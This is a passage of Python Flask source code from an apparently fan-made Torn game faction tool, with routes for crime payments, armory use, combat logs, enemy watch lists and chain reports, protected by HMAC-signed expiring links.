return render_template('message.html', message='failed to discover the history intended by this click', logged_in=logged_in)
rodb = read_sqlite.Rodb()
faction_sum = rodb.get_faction_for_player(current_user.username)
player = rodb.get_player_data(current_user.username)
is_leader = bool_leader(int(current_user.username), faction_sum['fid'])
# check time and hmac
right_now = int(time.time())
if ((int(timestamp) + 86400) < right_now):
return render_template('message.html', message='link expired; cannot use it', logged_in=logged_in)
# either show all the data (up to the last year) or just a recent extract
long_search = False
if history_column == 'history':
long_search = True
flask_parm = (str(tid) + '-' + str(cn) + '-' + str(timestamp) + '-history' ).encode("utf-8")
else:
flask_parm = (str(tid) + '-' + str(cn) + '-' + str(timestamp)).encode("utf-8")
# read the payment policy of this faction (e.g. pay 20% of PA winnings to each player)
oc_percentages = rodb.get_oc_payment_policy(tid)
if int(cn) in oc_percentages:
percent_to_pay = oc_percentages[int(cn)][2]
hmac_hex_hist = hmac.new(hmac_key, flask_parm, digestmod=hashlib.sha1).hexdigest()
if not hmac_hex_hist == hmac_given:
return render_template('message.html', message='link has been altered; cannot use it', logged_in=logged_in)
form = PaymentForm()
# - - - - - - - POST section
if request.method == 'POST':
if not is_leader:
return redirect('/rhubarb/logout')
if form.validate_on_submit():
try:
form_faction = request.form['faction_id']
ocp = request.form['oc_plan_id']
except:
app.logger.info('error involving paymentform')
return redirect('/rhubarb/faction_ov')
else:
app.logger.info('paymentform fails validation')
return redirect('/rhubarb/faction_ov')
# write to ORM payment for (form_faction,ocp) by current user at now
new_pay_id=int(random.random() * 1000000000)
pay = Payment_cache(id=new_pay_id, faction_id=int(tid), oc_plan_id=int(ocp), timestamp=int(time.time()), paid_by=int(cu))
db.session.add(pay)
db.session.commit()
return redirect('/rhubarb/faction_oc_history/' + tid_cn_t)
# - - - - - - - POST section
player = {'name':'no name'}
if int(cn):
try:
faction_sum = rodb.get_faction_for_player(current_user.username)
if not faction_sum['fid'] == int(tid):
# viewing from outside faction
return render_template('message.html', message='organised crime data - need to be logged in and in the faction to see that', logged_in=logged_in)
except:
# viewing from outside faction
return render_template('message.html', message='organised crime data - need to be logged in and in the faction to see that', logged_in=logged_in)
else:
# This is a player request and not a faction request - indicated by crime number 0.
# no need to authenticate the user but we do want the name
player = rodb.get_player_data(tid)
# This is the file with Payment_cache defined. Read ORM here and pass details to rodb.get_oc()
payment_query = db.session.query(Payment_cache).filter(Payment_cache.faction_id == tid)
want_payment = payment_query.all()
cached_payments = {}
for cached in want_payment:
cached_payments[cached.oc_plan_id] = {'paid_at':cached.timestamp, 'paid_by':cached.paid_by}
try:
octable, future = rodb.get_oc(tid, cn, long_search, cached_payments) # "tid" might be fid or pid
except:
# example data
octable = [[ 'Today', 8, 'failed to fetch octable', {'4':'Duke', '317178':'Flex'} , {'money':100, 'respect':5, 'delay':1800}, {'paid_by':0, 'paid_at':0}, 1234 ],
[ 'Yesterday', 8, 'failed to fetch octable', {'1455847':'Para'} , {'result':'FAIL', 'delay':60}, {'paid_by':0, 'paid_at':0}, 2345 ]]
return render_template("completed_oc.html", form=form, cn=int(cn), player_name=player['name'], cu=cu, octable=octable, make_links=True if int(tid) >0 else False, percent_to_pay=percent_to_pay)
#=================================================================================
@app.route("/armory_index", methods=['GET'])
@login_required
def armory_index():
if current_user.must_change_pw:
return redirect('/rhubarb/change_pw')
rodb = read_sqlite.Rodb()
faction_sum = rodb.get_faction_for_player(current_user.username)
player = rodb.get_player_data(current_user.username)
is_leader = bool_leader(int(current_user.username), faction_sum['fid'])
if not is_leader:
return render_template('message.html', title='Denied', u=current_user.username, player=player, message='No access to armorynews!', logged_in=True)
f_id = faction_sum['fid']
players = {}
conn = sqlite3.connect('file:/var/torn/readonly_db?mode=ro', uri=True)
c = conn.cursor()
c.execute("select player_id,neumune,empty_blood,morphine,full_blood,first_aid,small_first_aid,bottle_beer,xanax,energy_refill from factionconsumption where faction_id=?", (f_id,))
for row in c:
p = row[0]
# Not as nice as Perl - am I missing a Python trick here?
if not p in players:
players[p] = {}
players[p]['neumune'] = row[1]
players[p]['empty_blood'] = row[2]
players[p]['morphine'] = row[3]
players[p]['full_blood'] = row[4]
players[p]['first_aid'] = row[5]
players[p]['small_first_aid'] = row[6]
players[p]['bottle_beer'] = row[7]
players[p]['xanax'] = row[8]
players[p]['energy_refill'] = row[9]
else:
players[p]['neumune'] += row[1]
players[p]['empty_blood'] += row[2]
players[p]['morphine'] += row[3]
players[p]['full_blood'] += row[4]
players[p]['first_aid'] += row[5]
players[p]['small_first_aid'] += row[6]
players[p]['bottle_beer'] += row[7]
players[p]['xanax'] += row[8]
players[p]['energy_refill'] += row[9]
c.close()
conn.close()
right_now = int(time.time())
for p in players.keys():
players[p]['name'] = rodb.pid2namepid(p)
display_selection = (str(p) + '-' + str(right_now) ).encode("utf-8")
players[p]['url'] = '/rhubarb/armorynews/' + str(p) + '-' + str(right_now) + '-' + hmac.new(hmac_key, display_selection, digestmod=hashlib.sha1).hexdigest()
return render_template("faction_stuff_used.html", players=players)
#=================================================================================
@app.route("/rhubarb/armorynews/<player_t>", methods=['GET'])
@app.route("/armorynews/<player_t>", methods=['GET'])
@login_required
def armorynews(player_t):
p_id = None
timestamp = None
given_hmac = None
right_now = int(time.time())
re_object = armory_token.match(player_t)
if re_object:
p_id = re_object.group(1)
timestamp = re_object.group(2)
given_hmac = re_object.group(3)
else:
app.logger.info('in armorynews RE did not match URL')
return render_template("bad_graph_request.html")
# calc correct hmac
display_selection = (str(p_id) + '-' + str(timestamp) ).encode("utf-8")
hmac_hex = hmac.new(hmac_key, display_selection, digestmod=hashlib.sha1).hexdigest()
# test for correct hmac
if not hmac.compare_digest(hmac_hex, given_hmac):
return render_template('message.html', message='link has been altered; cannot use it', logged_in=True)
# test for acceptable timestamp
if ((int(timestamp) + 86400) < right_now):
return render_template('message.html', message='too old; link has expired', logged_in=True)
# need to know faction of the player viewing this page
rodb = read_sqlite.Rodb()
faction_sum = rodb.get_faction_for_player(current_user.username)
f_id = faction_sum['fid']
player = rodb.get_player_data(p_id)
stuff_used = []
parm = (int(p_id), int(f_id),)
conn = sqlite3.connect('file:/var/torn/readonly_db?mode=ro', uri=True)
c = conn.cursor()
c.execute("select et,words from factionconsumption where player_id=? and faction_id=? order by et desc", parm)
for row in c:
printable_time = time.strftime("%Y-%m-%d %H:%M",time.gmtime(row[0]))
stuff_used.append([printable_time, row[1]])
c.close()
conn.close()
return render_template("stuff_used.html", player_name=player['name'], stuff_used=stuff_used)
#=================================================================================
@app.route("/chain_bonus/<faction_player_t>", methods=['GET'])
@app.route("/rhubarb/chain_bonus/<faction_player_t>", methods=['GET'])
def chain_bonus(faction_player_t):
f_id = None
p_id = None
timestamp = None
given_hmac = None
right_now = int(time.time())
logged_in = False
try:
u = current_user.username
logged_in = True
except:
pass
re_object = bonus_token.match(faction_player_t)
if re_object:
f_id = re_object.group(1)
p_id = re_object.group(2)
timestamp = re_object.group(3)
given_hmac = re_object.group(4)
else:
app.logger.info('in chain_bonus RE did not match URL')
return render_template("bad_graph_request.html")
# calc correct hmac
display_selection = (str(f_id) + '-' + str(p_id) + 'bonus' + str(timestamp) ).encode("utf-8")
hmac_hex = hmac.new(hmac_key, display_selection, digestmod=hashlib.sha1).hexdigest()
# test for correct hmac
if not hmac.compare_digest(hmac_hex, given_hmac):
return render_template('message.html', message='link has been altered; cannot use it', logged_in=logged_in)
# test for acceptable timestamp
if ((int(timestamp) + 86400) < right_now):
return render_template('message.html', message='too old; link has expired', logged_in=logged_in)
# Need to show details of the player we are enquring about, which might not be the current player viewing it.
tbefore = int(time.time()) - 3600 # an hour ago
parm = (int(f_id), int(p_id), tbefore,)
conn = sqlite3.connect('file:/var/torn/readonly_db?mode=ro', uri=True)
c = conn.cursor()
bonus_list = []
c.execute("select et,att_name,att_id,verb,def_name,def_id,respect from long_term_bonus where fid=? and att_id=? and et<? order by et desc", parm)
for row in c:
record = list(row)
record[0] = (time.strftime("%Y-%m-%d", time.gmtime(record[0])))
bonus_list.append(record)
c.execute("select name from namelevel where player_id=?", (int(p_id),))
name = '?'
for row in c:
name = row[0]
c.close()
conn.close()
rodb = read_sqlite.Rodb()
faction_name = rodb.get_faction_name(f_id)
return render_template("chain_bonus.html", faction_id=f_id, faction_name=faction_name, player={'name':name, 'pid':p_id, 'chain_bonus_list':bonus_list})
#=================================================================================
@app.route("/defend_summary/<faction_player_role_t>", methods=['GET'])
@app.route("/rhubarb/defend_summary/<faction_player_role_t>", methods=['GET'])
def defend_summary(faction_player_role_t):
f_id = None
p_id = None
role = None
timestamp = None
given_hmac = None
df = None
right_now = int(time.time())
logged_in = False
try:
u = current_user.username
logged_in = True
except:
pass
# what page is this meant to produce, attack or defend?
re_object = combat_token.match(faction_player_role_t)
if re_object:
f_id = re_object.group(1)
p_id = re_object.group(2)
role = re_object.group(3)
timestamp = re_object.group(4)
given_hmac = re_object.group(5)
else:
app.logger.info('in defend_summary RE did not match URL')
return render_template("bad_graph_request.html")
# calc correct hmac
display_selection = (str(f_id) + '-' + str(p_id) + role + str(timestamp) ).encode("utf-8")
hmac_hex = hmac.new(hmac_key, display_selection, digestmod=hashlib.sha1).hexdigest()
# test for correct hmac
if not hmac.compare_digest(hmac_hex, given_hmac):
return render_template('message.html', message='link has been altered; cannot use it', logged_in=logged_in)
# test for acceptable timestamp
if ((int(timestamp) + (86400 * 7)) < right_now):
return render_template('message.html', message='too old; link has expired', logged_in=logged_in)
# no time limit on defends other than the 28 days of storage
parm = (int(f_id), int(p_id),)
conn = sqlite3.connect('file:/var/torn/readonly_db?mode=ro', uri=True)
c = conn.cursor()
if 'defsum' == role: # only allowed role
c.execute("select count(att_id) as num,att_name,att_id,def_name,def_id from combat_events where fid=? and def_id=? and outcome like '%lost' group by att_id order by att_id", parm)
else:
c.close()
conn.close()
return render_template("bad_graph_request.html")
defend_lines = []
safe_text = dehtml.Dehtml()
for row in c:
defend_lines.append(row)
c.close()
conn.close()
return render_template("defend_summary.html", dl=defend_lines)
#=================================================================================
@app.route("/faction_attack/<faction_player_role_t>", methods=['GET'])
@app.route("/rhubarb/faction_attack/<faction_player_role_t>", methods=['GET'])
def combat_events(faction_player_role_t):
f_id = None
p_id = None
role = None
timestamp = None
given_hmac = None
df = None
right_now = int(time.time())
logged_in = False
try:
u = current_user.username
logged_in = True
except:
pass
# what page is this meant to produce, attack or defend?
re_object = combat_token.match(faction_player_role_t)
if re_object:
f_id = re_object.group(1)
p_id = re_object.group(2)
role = re_object.group(3)
timestamp = re_object.group(4)
given_hmac = re_object.group(5)
else:
app.logger.info('in combat_events RE did not match URL')
return render_template("bad_graph_request.html")
# calc correct hmac
display_selection = (str(f_id) + '-' + str(p_id) + role + str(timestamp) ).encode("utf-8")
hmac_hex = hmac.new(hmac_key, display_selection, digestmod=hashlib.sha1).hexdigest()
# test for correct hmac
if not hmac.compare_digest(hmac_hex, given_hmac):
return render_template('message.html', message='link has been altered; cannot use it', logged_in=logged_in)
# test for acceptable timestamp
if ((int(timestamp) + 86400) < right_now):
return render_template('message.html', message='too old; link has expired', logged_in=logged_in)
tbefore = int(time.time()) - 3600 # an hour ago
parm = (int(f_id), int(p_id), tbefore,)
conn = sqlite3.connect('file:/var/torn/readonly_db?mode=ro', uri=True)
c = conn.cursor()
if 'attack' == role:
c.execute("select et,att_name,att_id,verb,def_name,def_id,outcome from combat_events where fid=? and att_id=? and et<? order by et desc", parm)
elif 'defend' == role:
c.execute("select et,att_name,att_id,verb,def_name,def_id,outcome from combat_events where fid=? and def_id=? and et<? order by et desc", parm)
else:
c.close()
conn.close()
return render_template("bad_graph_request.html")
att_count = 0
items = []
old_et = 0
old_att_id = 0
old_def_id = 0
safe_text = dehtml.Dehtml()
for i in c:
et = i[0]
if (old_et == et) and (old_att_id == i[2]) and (old_def_id == i[5]):
continue
iso_time = datetime.datetime.utcfromtimestamp(et).isoformat()
items.append( { 'et': iso_time, 'att_name': safe_text.html_clean(i[1]), 'att_id': i[2], 'verb': i[3], 'def_name': safe_text.html_clean(i[4]), 'def_id': i[5], 'outcome': safe_text.html_clean(i[6])} )
att_count += 1
old_et = et
old_att_id = i[2]
old_def_id = i[5]
if 'attack' == role:
player_name = i[1]
else:
player_name = i[4]
c.close()
conn.close()
if att_count:
return render_template("combat_events.html", data=items, role=role, player_name=player_name)
return render_template("combat_none.html", role=role, player_id=p_id)
#=================================================================================
@app.route("/rhubarb/enemy_watch", methods=['GET','POST'])
@app.route("/enemy_watch", methods=['GET','POST'])
@login_required
def enemy_watch():
form = EnemyForm()
rodb = read_sqlite.Rodb()
faction_sum = rodb.get_faction_for_player(current_user.username)
f_id = int(faction_sum['fid'])
# if form.validate_on_submit():
if request.method == 'POST':
try:
enemy = request.form['enemy']
time_id = request.form['timerange_id']
except:
app.logger.info('error reading from enemy form')
return render_template('message.html', message='something wrong with enemy selection', logged_in=True)
# get enemy and time details from ORM
wantenemy = Enemy.query.filter_by(id = enemy).first()
if not wantenemy:
# unknown enemy id in postgres
return render_template('message.html', message='enemy selection not recognised', logged_in=True)
if not wantenemy.f_id == f_id:
return render_template('message.html', message='enemy selection looks invalid for this faction', logged_in=True)
wanttime = Timerange.query.filter_by(id = time_id).first()
if not wanttime:
# unknown time id in postgres
return render_template('message.html', message='timerange selection not recognised', logged_in=True)
if not wanttime.f_id == f_id:
return render_template('message.html', message='timerange selection looks invalid for this faction', logged_in=True)
# link to next page (with HMAC)
selector = str(wantenemy.tornid) + '-' + str(wanttime.id) + '-' + str(int(time.time()))
hmac_hex = hmac.new(hmac_key, selector.encode("utf-8"), digestmod=hashlib.sha1).hexdigest()
return redirect('/rhubarb/enemy_log/' + selector + '-' + hmac_hex)
# show form before submission
form.enemy.choices = [(e.id, e.username + '[' + e.tornid + ']') for e in Enemy.query.filter_by(f_id = f_id).all()]
form.timerange_id.choices = [(t.id, time.strftime("%A %Y-%m-%d %H:%M",time.gmtime(t.tstart)) + ' to ' + time.strftime("%A %Y-%m-%d %H:%M",time.gmtime(t.tend))) for t in Timerange.query.filter_by(f_id = f_id).all()]
return render_template('enemy_watch.html', title='Enemy Watch', form=form, now=int(time.time()))
#=================================================================================
@app.route("/rhubarb/enemy_watch_faction", methods=['GET','POST'])
@app.route("/enemy_watch_faction", methods=['GET','POST'])
@login_required
def enemy_watch_faction():
form = EnemyForm()
rodb = read_sqlite.Rodb()
faction_sum = rodb.get_faction_for_player(current_user.username)
f_id = int(faction_sum['fid'])
# if form.validate_on_submit():
if request.method == 'POST':
try:
enemy = request.form['enemy']
time_id = request.form['timerange_id']
except:
app.logger.info('error reading from enemy form')
return render_template('message.html', message='something wrong with enemy selection', logged_in=True)
wanttime = Timerange.query.filter_by(id = time_id).first()
if not wanttime:
# unknown time id in postgres
return render_template('message.html', message='timerange selection not recognised', logged_in=True)
if not wanttime.f_id == f_id:
return render_template('message.html', message='timerange selection looks invalid for this faction', logged_in=True)
# get details of taget faction
enemy_factions = {} # count of attacks by us on other factions
all_enemy_faction_attacks = rodb.get_targeted_chain(f_id, enemy, wanttime.tstart, wanttime.tend) # specific faction, specific time
player_items = []
total = 0
for apid in all_enemy_faction_attacks:
# XXX not needed ? # link to next pages (with HMAC)
# selector = str(apid) + '-' + str(enemy) + '-' + str(wanttime.id) + '-' + str(int(time.time()))
# hmac_hex = hmac.new(hmac_key, selector.encode("utf-8"), digestmod=hashlib.sha1).hexdigest()
player_items.append( [all_enemy_faction_attacks[apid][2], all_enemy_faction_attacks[apid][1], all_enemy_faction_attacks[apid][0]] )
total += all_enemy_faction_attacks[apid][2]
return render_template('enemy_watch_faction2.html', player_items=player_items, enemy_faction_name=rodb.get_faction_name(enemy), total=total)
# show form before submission
enemy_factions = {} # count of attacks by us on other factions
all_enemy_faction_attacks = rodb.get_targeted_chain(f_id, None, 0, 2100000000) # not specific to faction, all time
for x in all_enemy_faction_attacks.keys():
# only bother with worthwhile numbers
if x:
if all_enemy_faction_attacks[x] >= 50:
enemy_factions[x] = all_enemy_faction_attacks[x]
sorted_ef = sorted(enemy_factions.items(), key=lambda kv: kv[1], reverse=True)
enemy_factions_counted = list(sorted_ef)
form.enemy.choices = [(ek[0], rodb.get_faction_name(ek[0]) + '[' + str(ek[0]) + ']') for ek in enemy_factions_counted]
form.timerange_id.choices = [(t.id, time.strftime("%A %Y-%m-%d %H:%M",time.gmtime(t.tstart)) + ' to ' + time.strftime("%A %Y-%m-%d %H:%M",time.gmtime(t.tend))) for t in Timerange.query.filter_by(f_id = f_id).all()]
return render_template('enemy_watch_faction.html', title='Enemy Watch Faction', form=form, enemy_factions_counted=enemy_factions_counted, now=int(time.time()))
#=================================================================================
@app.route("/enemy_log/<player_t_t_hmac>", methods=['GET'])
@app.route("/rhubarb/enemy_log/<player_t_t_hmac>", methods=['GET'])
@login_required
def enemy_log(player_t_t_hmac):
# display summary for that enemy and time range
# with links to times and outcomes
p_id = None
time_id = None
timestamp = None
given_hmac = None
right_now = int(time.time())
re_object = enemy_token.match(player_t_t_hmac)
if re_object:
p_id = re_object.group(1)
time_id = re_object.group(2)
timestamp = re_object.group(3)
given_hmac = re_object.group(4)
else:
app.logger.info('in enemy_log RE did not match URL')
return render_template("bad_graph_request.html")
# calc correct hmac
display_selection = (str(p_id) + '-' + str(time_id) + '-' + str(timestamp) ).encode("utf-8")
hmac_hex = hmac.new(hmac_key, display_selection, digestmod=hashlib.sha1).hexdigest()
# test for correct hmac
if not hmac.compare_digest(hmac_hex, given_hmac):
return render_template('message.html', message='link has been altered; cannot use it', logged_in=True)
# test for acceptable timestamp
if ((int(timestamp) + 86400) < right_now):
return render_template('message.html', message='too old; link has expired', logged_in=True)
# need to know faction of the player viewing this page
rodb = read_sqlite.Rodb()
faction_sum = rodb.get_faction_for_player(current_user.username)
f_id = faction_sum['fid']
enemy = Enemy.query.filter_by(tornid = p_id).first()
if not enemy:
return render_template('message.html', message='enemy not recognised in enemy_log', logged_in=True)
wanttime = Timerange.query.filter_by(id = time_id).first()
if not wanttime:
# unknown time id in postgres
return render_template('message.html', message='timerange not recognised in enemy_log', logged_in=True)
if not wanttime.f_id == f_id:
return render_template('message.html', message='timerange selection looks invalid for this faction in enemy_log', logged_in=True)
tstart = wanttime.tstart
tend = wanttime.tend
if tend > right_now - 3600:
tend = right_now - 3600 # do not display events within the last hour
attacks = rodb.get_attacks_on_target(faction_sum['fid'], p_id, tstart, tend)
deco_attacks = []
for d in attacks:
name = str(d[1]) + '[' + str(d[2]) + ']'
display_selection = str(p_id) + '-' + str(d[2])+ '-' + str(tstart) + '-' + str(tend)
hmac_hex = hmac.new(hmac_key, display_selection.encode("utf-8"), digestmod=hashlib.sha1).hexdigest()
link = '/rhubarb/target_log/' + display_selection + '-' + hmac_hex
deco_attacks.append([d[0], name, link])
return render_template("enemy_log.html", faction_sum=faction_sum, attacks=deco_attacks, target=str(enemy.username) + '[' + str(p_id) + ']')
#=================================================================================
@app.route("/target_log/<defid_attid_tstart_tend_hmac>", methods=['GET'])
@app.route("/rhubarb/target_log/<defid_attid_tstart_tend_hmac>", methods=['GET'])
def target_log(defid_attid_tstart_tend_hmac):
# defails of attacks on a specific target by a specific player
defid = None
attid = None
tstart = None
tend = None
given_hmac = None
right_now = int(time.time())
re_object = target_token.match(defid_attid_tstart_tend_hmac)
if re_object:
defid = re_object.group(1)
attid = re_object.group(2)
tstart = re_object.group(3)
tend = re_object.group(4)
given_hmac = re_object.group(5)
else:
app.logger.info('in target_log RE did not match URL')
return render_template("bad_graph_request.html")
# calc correct hmac
display_selection = str(defid) + '-' + str(attid)+ '-' + str(tstart) + '-' + str(tend)
hmac_hex = hmac.new(hmac_key, display_selection.encode("utf-8"), digestmod=hashlib.sha1).hexdigest()
# test for correct hmac
if not hmac.compare_digest(hmac_hex, given_hmac):
return render_template('message.html', message='link has been altered; cannot use it', logged_in=True)
# from here it's similar to combat_events and uses the same template
role='attack'
conn = sqlite3.connect('file:/var/torn/readonly_db?mode=ro', uri=True)
c = conn.cursor()
c.execute("select et,att_name,att_id,verb,def_name,def_id,outcome from combat_events where def_id = ? and att_id=? and et>? and et<? order by et desc", (defid,attid,tstart,tend,))
items = []
old_et = 0
old_att_id = 0
old_def_id = 0
safe_text = dehtml.Dehtml()
for i in c:
et = i[0]
if (old_et == et) and (old_att_id == i[2]) and (old_def_id == i[5]):
continue
iso_time = datetime.datetime.utcfromtimestamp(et).isoformat()
items.append( { 'et': iso_time, 'att_name': safe_text.html_clean(i[1]), 'att_id': i[2], 'verb': i[3], 'def_name': safe_text.html_clean(i[4]), 'def_id': i[5], 'outcome': safe_text.html_clean(i[6])} )
old_et = et
old_att_id = i[2]
old_def_id = i[5]
player_name = i[1]
c.close()
conn.close()
return render_template("combat_events.html", data=items, role=role, player_name=player_name)
#=================================================================================
@app.route("/delete_faction_enemies/", methods=['GET','POST'])
@app.route("/rhubarb/delete_faction_enemies/", methods=['GET','POST'])
@login_required
def delete_faction_enemies():
form = DeleteEnemyForm()
rodb = read_sqlite.Rodb()
faction_sum = rodb.get_faction_for_player(current_user.username)
f_id = int(faction_sum['fid'])
is_leader = bool_leader(int(current_user.username), faction_sum['fid'])
if not is_leader:
return redirect('/rhubarb/home')
# read enemies from ORM - BEFORE the POST section otherwise form choices won't be ready
baddies = {}
want_enemy = Enemy.query.filter_by(f_id = faction_sum['fid']).all()
for enemy in want_enemy:
baddies[enemy.tornid] = enemy.username
form.de_id.choices = [( int(k), baddies[k] + '[' + k + ']') for k in sorted(baddies.keys())]
# - - - - - - - POST section
if request.method == 'POST':
if form.validate_on_submit():
try:
de_id = request.form['de_id']
except:
app.logger.info('error involving DeleteEnemyForm')
return render_template('message.html', title='delete enemy', message='DeleteEnemyForm exception reading input', logged_in=True)
else:
app.logger.info('DeleteEnemyForm fails validation')
return render_template('message.html', title='delete enemy', message='DeleteEnemyForm failed validation: ' + str(request.form), form=form , logged_in=True)
if de_id:
wantenemy = Enemy.query.filter_by(tornid = de_id).filter_by(f_id = faction_sum['fid']).first()
if wantenemy:
db.session.delete(wantenemy)
db.session.commit()
return redirect('/rhubarb/enemy_watch')
# - - - - - - - POST section
faction_name = rodb.get_faction_name(f_id)
return render_template('delete_faction_enemies.html', title='Enemies', form=form, f_id=f_id, faction_name=faction_name)
#=================================================================================
@app.route("/add_faction_enemies/", methods=['GET','POST'])
@app.route("/rhubarb/add_faction_enemies/", methods=['GET','POST'])
@login_required
def add_faction_enemies():
form = AddEnemyForm()
rodb = read_sqlite.Rodb()
faction_sum = rodb.get_faction_for_player(current_user.username)
f_id = int(faction_sum['fid'])
is_leader = bool_leader(int(current_user.username), faction_sum['fid'])
if not is_leader:
return redirect('/rhubarb/home')
# - - - - - - - POST section
if request.method == 'POST':
if form.validate_on_submit():
try:
add_id = request.form['add_id']
except:
app.logger.info('error involving AddEnemyForm')
return render_template('message.html', title='add enemy', message='AddEnemyForm exception reading input', logged_in=True)
else:
app.logger.info('AddEnemyForm fails validation')
return render_template('message.html', title='add enemy', message='AddEnemyForm failed validation: ' + str(request.form), form=form , logged_in=True)
# XXX form validation could do better
try:
actual_integer = int(add_id)
except ValueError:
return render_template('message.html', title='add enemy', message='AddEnemyForm accepts only an integer', form=form , logged_in=True)
if add_id:
# XXX does not obtain username (fix up in another program) or check whether already in table
new_enemy = Enemy (tornid = add_id, f_id = faction_sum['fid'], username = '?')
db.session.add(new_enemy)
db.session.commit()
return redirect('/rhubarb/enemy_watch')
# - - - - - - - POST section
faction_name = rodb.get_faction_name(f_id)
return render_template('add_faction_enemies.html', title='Enemies', form=form, f_id=f_id, faction_name=faction_name)
#=================================================================================
@app.route("/define_timerange/<t_to_t>", methods=['GET','POST'])
@app.route("/rhubarb/define_timerange/<t_to_t>", methods=['GET','POST'])
@login_required
def define_timerange(t_to_t):
form = TimeForm()
rodb = read_sqlite.Rodb()
faction_sum = rodb.get_faction_for_player(current_user.username)
f_id = int(faction_sum['fid'])
# sane defaults
tstart = int(time.time())
tend = tstart + 86400
# what is t_to_t telling us?
re_object = time_interval.match(t_to_t)
if re_object:
tstart = int(re_object.group(1))
tend = int(re_object.group(2))
if tstart > tend:
tstart, tend = tend, tstart
# - - - - - - - POST section
if request.method == 'POST':
new_tr = Timerange (tstart=tstart, tend=tend, f_id=f_id)
db.session.add(new_tr)
db.session.commit()
#return render_template('message.html', title='TBC', message='plan to creat this timerange {} to {}'.format(tstart,tend), logged_in=True)
return redirect('/rhubarb/enemy_watch')
# - - - - - - - POST section
# variations: plus one day etc
start_block = []
start_block.append( [ 'planned time', tstart, time.strftime("%A %Y-%m-%d %H:%M",time.gmtime(tstart)) ] )
start_block.append( [ 'plus 1 day', tstart+86400, time.strftime("%A %Y-%m-%d %H:%M",time.gmtime(tstart+86400)) ] )
start_block.append( [ 'minus 1 day', tstart-86400, time.strftime("%A %Y-%m-%d %H:%M",time.gmtime(tstart-86400)) ] )
start_block.append( [ 'plus 1 hour', tstart+3600, time.strftime("%A %Y-%m-%d %H:%M",time.gmtime(tstart+3600)) ] )
start_block.append( [ 'minus 1 hour', tstart-3600, time.strftime("%A %Y-%m-%d %H:%M",time.gmtime(tstart-3600)) ] )
start_block.append( [ 'plus 1 minute', tstart+60, time.strftime("%A %Y-%m-%d %H:%M",time.gmtime(tstart+60)) ] )
start_block.append( [ 'minus 1 minute', tstart-60, time.strftime("%A %Y-%m-%d %H:%M",time.gmtime(tstart-60)) ] )
end_block = []
end_block.append( [ 'planned time', tend, time.strftime("%A %Y-%m-%d %H:%M",time.gmtime(tend)) ] )
end_block.append( [ 'plus 1 day', tend+86400, time.strftime("%A %Y-%m-%d %H:%M",time.gmtime(tend+86400)) ] )
end_block.append( [ 'minus 1 day', tend-86400, time.strftime("%A %Y-%m-%d %H:%M",time.gmtime(tend-86400)) ] )
end_block.append( [ 'plus 1 hour', tend+3600, time.strftime("%A %Y-%m-%d %H:%M",time.gmtime(tend+3600)) ] )
end_block.append( [ 'minus 1 hour', tend-3600, time.strftime("%A %Y-%m-%d %H:%M",time.gmtime(tend-3600)) ] )
end_block.append( [ 'plus 1 minute', tend+60, time.strftime("%A %Y-%m-%d %H:%M",time.gmtime(tend+60)) ] )
end_block.append( [ 'minus 1 minute', tend-60, time.strftime("%A %Y-%m-%d %H:%M",time.gmtime(tend-60)) ] )
rodb = read_sqlite.Rodb()
faction_name = rodb.get_faction_name(f_id)
return render_template('define_timerange.html', title='Timerange', form=form, start_block=start_block, end_block=end_block, tstart=tstart, tend=tend, f_id=f_id, faction_name=faction_name)
#=================================================================================
@app.route("/chain_reports", methods=['GET'])
@app.route("/rhubarb/chain_reports", methods=['GET'])
@login_required
def chain_reports():
rodb = read_sqlite.Rodb()
player = rodb.get_player_data(current_user.username)
faction_sum = rodb.get_faction_for_player(current_user.username)
f_id = faction_sum['fid']
chains_from_orm = Chains.query.filter_by(f_id = f_id).all()
# finished and unfinished chains
chains_fin = []
chains_unf = []
for chain in chains_from_orm:
start_text = time.strftime("%A %Y-%m-%d %H:%M",time.gmtime(chain.tstart))
chain_len = chain.chain_len
respect = chain.respect
if chain.tend:
end_text = time.strftime("%A %Y-%m-%d %H:%M",time.gmtime(chain.tend))
else:
end_text = time.strftime("%A %Y-%m-%d %H:%M",time.gmtime(chain.et))
# calc correct hmac
right_now = int(time.time())
chain_selection_pre = str(f_id) + '-chain-' + str(chain.tstart) + '-' + str(right_now)
chain_selection = chain_selection_pre.encode("utf-8")
hmac_hex = hmac.new(hmac_key, chain_selection, digestmod=hashlib.sha1).hexdigest()
stage = [ chain_selection_pre + '-' + hmac_hex, start_text, end_text, chain_len, respect ]
if chain.tend:
chains_fin.append(stage)
else:
chains_unf.append(stage)
faction_name = rodb.get_faction_name(f_id)
return render_template('chain_reports.html', title='Chain reports', chains_fin=chains_fin, chains_unf=chains_unf, f_id=f_id, faction_name=faction_name)
#=================================================================================
@app.route("/chain_details/<fid_tstart_timestamp_hmac>", methods=['GET'])
@app.route("/rhubarb/chain_details/<fid_tstart_timestamp_hmac>", methods=['GET'])
def chain_details(fid_tstart_timestamp_hmac):
# what chain is this meant to display?
re_object = chain_token.match(fid_tstart_timestamp_hmac)
if re_object:
f_id = re_object.group(1)
chain_tstart = re_object.group(2)
timestamp = re_object.group(3)
given_hmac = re_object.group(4)
else:
app.logger.info('in chain_details RE did not match URL')
return render_template("bad_graph_request.html")
# calc correct hmac
chain_selection = ( str(f_id) + '-chain-' + str(chain_tstart) + '-' + str(timestamp) ).encode("utf-8")
hmac_hex = hmac.new(hmac_key, chain_selection, digestmod=hashlib.sha1).hexdigest()
# test for correct hmac etc
right_now = int(time.time())
if not hmac.compare_digest(hmac_hex, given_hmac):
app.logger.info('in chain_details HMAC disagreement')
return render_template("bad_graph_request.html")
if ((int(timestamp) + 86400) < right_now):
app.logger.info('in chain_details timestamp is old')
return render_template("bad_graph_request.html")
# read from ORM which chain has the right f_id and tstart
ch = None
chains_from_orm = Chains.query.filter_by(f_id = f_id).filter_by(tstart = chain_tstart).all()
for chain in chains_from_orm:
ch = chain
if not ch:
return render_template('message.html', message='The chain you are looking for is not found.', logged_in=False)
# outline
tstart_text = time.strftime("%Y-%m-%d %H:%M",time.gmtime(ch.tstart))
if ch.tend:
et_text = time.strftime("%Y-%m-%d %H:%M",time.gmtime(ch.tend))
over = True
else:
et_text = time.strftime("%Y-%m-%d %H:%M",time.gmtime(ch.et))
over = False
outline = [tstart_text, et_text, over, ch.chain_len, ch.respect ]
# members for names
who_inactive = {}
our_players = Chain_members.query.filter_by(pg_chain_id = ch.pg_chain_id).all()
for p_mem in our_players:
who_inactive[p_mem.player_id] = p_mem.player_name + '[' + str(p_mem.player_id) + ']'
# bonus
right_now = int(time.time())
bonus_list = []
bonus_table = Bonus_events.query.filter_by(pg_chain_id = ch.pg_chain_id).all()
